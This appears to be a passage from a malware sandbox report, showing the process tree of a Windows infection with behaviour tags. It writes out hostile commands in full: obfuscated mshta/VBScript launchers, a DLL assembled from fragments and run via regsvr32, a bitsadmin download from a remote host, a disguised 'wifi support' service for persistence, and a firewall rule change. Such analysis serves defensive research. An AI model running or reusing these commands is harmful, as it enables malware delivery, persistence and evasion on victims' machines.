                                                                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                    timeout /t 6
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Delays execution with timeout.exe
                                                                                                                                                                    PID:2020
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\4BB0.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\4BB0.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2160
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\4BB0.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\4BB0.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2372
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\4BB0.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\4BB0.exe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5972
                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:5776
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
                                                                                                                                                                              ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:6588
                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:6484
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:4640
                                                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                      "C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS + rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U " , 0 , true ) )
                                                                                                                                                                                      5⤵
                                                                                                                                                                                        PID:4268
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS + rcEI.~+Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:6348
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:4140
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:5380
                                                                                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                  regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                  • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                                  PID:4104
                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                            taskkill -F -im "4BB0.exe"
                                                                                                                                                                                            4⤵
                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                            PID:6524
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\599C.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\599C.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                      PID:5144
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\614E.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\614E.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:4368
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-7K082.tmp\614E.tmp
                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-7K082.tmp\614E.tmp" /SL5="$1042E,188175,104448,C:\Users\Admin\AppData\Local\Temp\614E.exe"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                          PID:7140
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-RUP58.tmp\134 Vaporeondè_éçè_)))_.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-RUP58.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                            PID:6292
                                                                                                                                                                                            • C:\Program Files\Windows Portable Devices\NKYUTFIXKV\irecord.exe
                                                                                                                                                                                              "C:\Program Files\Windows Portable Devices\NKYUTFIXKV\irecord.exe" /VERYSILENT
                                                                                                                                                                                              4⤵
                                                                                                                                                                                                PID:6624
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-3ULQA.tmp\irecord.tmp
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-3ULQA.tmp\irecord.tmp" /SL5="$4035E,5808768,66560,C:\Program Files\Windows Portable Devices\NKYUTFIXKV\irecord.exe" /VERYSILENT
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                  PID:5012
                                                                                                                                                                                                  • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                                    "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                    PID:5408
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\82-5a472-61c-05dae-64bd9f205a891\Hulezhegoshe.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\82-5a472-61c-05dae-64bd9f205a891\Hulezhegoshe.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                PID:1772
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\0a-87be7-3d5-06d95-d422835a98ff4\Xabovawexy.exe
                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\0a-87be7-3d5-06d95-d422835a98ff4\Xabovawexy.exe"
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:4868
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1mxqcoqb.q5u\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:4640
                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a0kf1rft.fc1\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                        PID:4700
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kqrgm4ob.4jk\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                          PID:6468
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\kqrgm4ob.4jk\Setup3310.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\kqrgm4ob.4jk\Setup3310.exe /Verysilent /subid=623
                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                              PID:5248
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-3U0QC.tmp\Setup3310.tmp
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-3U0QC.tmp\Setup3310.tmp" /SL5="$20444,138429,56832,C:\Users\Admin\AppData\Local\Temp\kqrgm4ob.4jk\Setup3310.exe" /Verysilent /subid=623
                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                PID:5236
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-LIR6U.tmp\Setup.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-LIR6U.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:7040
                                                                                                                                                                                                                    • C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
                                                                                                                                                                                                                      "C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                        PID:5368
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\NMemo3Setp.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\NMemo3Setp.exe" end
                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                            PID:4676
                                                                                                                                                                                                                        • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                                                          "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                          PID:5376
                                                                                                                                                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                              PID:2528
                                                                                                                                                                                                                          • C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
                                                                                                                                                                                                                            "C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                            PID:5488
                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q0x132re.41e\google-game.exe & exit
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:1548
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\q0x132re.41e\google-game.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\q0x132re.41e\google-game.exe
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:4288
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\q0x132re.41e\google-game.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\q0x132re.41e\google-game.exe" -a
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:6760
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhgwtnsa.oui\BrowzarBrowser_J013.exe & exit
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:5372
                                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:5180
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vhgwtnsa.oui\BrowzarBrowser_J013.exe
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\vhgwtnsa.oui\BrowzarBrowser_J013.exe
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:6944
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tmjvmf00.j1y\GcleanerWW.exe /mixone & exit
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                PID:2644
                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wm2hac4p.d3o\toolspab1.exe & exit
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:6140
                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                      PID:6528
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\wm2hac4p.d3o\toolspab1.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\wm2hac4p.d3o\toolspab1.exe
                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                      PID:6824
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\wm2hac4p.d3o\toolspab1.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\wm2hac4p.d3o\toolspab1.exe
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                        PID:6172
                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ryzzri2a.xoo\SunLabsPlayer.exe /S & exit
                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                      PID:4432
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ryzzri2a.xoo\SunLabsPlayer.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ryzzri2a.xoo\SunLabsPlayer.exe /S
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                        PID:6996
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                            PID:6516
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                              PID:5316
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                PID:6716
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                  PID:6480
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                    PID:2352
                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:3152
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                      PID:3296
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                      "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Download via BitsAdmin
                                                                                                                                                                                                                                                      PID:4844
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -phs4opgQYQzGH8jz -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                      PID:4668
                                                                                                                                                                                                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                                                                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pD83mn5aM5tet4nm -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:4548
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:1052
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:6776
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                              PID:3492
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:6724
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:424
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                    PID:2348
                                                                                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\fjnkJfWrEDeA\fjnkJfWrEDeA.dll" fjnkJfWrEDeA
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                        PID:684
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                                                                                                                                                      PID:4380
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                        PID:5944
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                          PID:7004
                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                            PID:7056
                                                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsmB178.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:6392
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:184
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9138.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\9138.exe
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4424
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9138.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\9138.exe"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                        PID:5548
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9698.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9698.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:2220
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\rxkkuegf\
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:2104
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hpipioxw.exe" C:\Windows\SysWOW64\rxkkuegf\
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:6432
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\sc.exe" create rxkkuegf binPath= "C:\Windows\SysWOW64\rxkkuegf\hpipioxw.exe /d\"C:\Users\Admin\AppData\Local\Temp\9698.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:2812
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\sc.exe" description rxkkuegf "wifi internet conection"
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                  PID:6764
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\sc.exe" start rxkkuegf
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:4268
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                      PID:5416
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\A8C9.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\A8C9.exe
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                    PID:204
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:7008
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                                                                                          PID:5384
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CEA2.exe
                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\CEA2.exe
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:1060
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\compattelrunner.exe
                                                                                                                                                                                                                                                                                        C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:4380
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
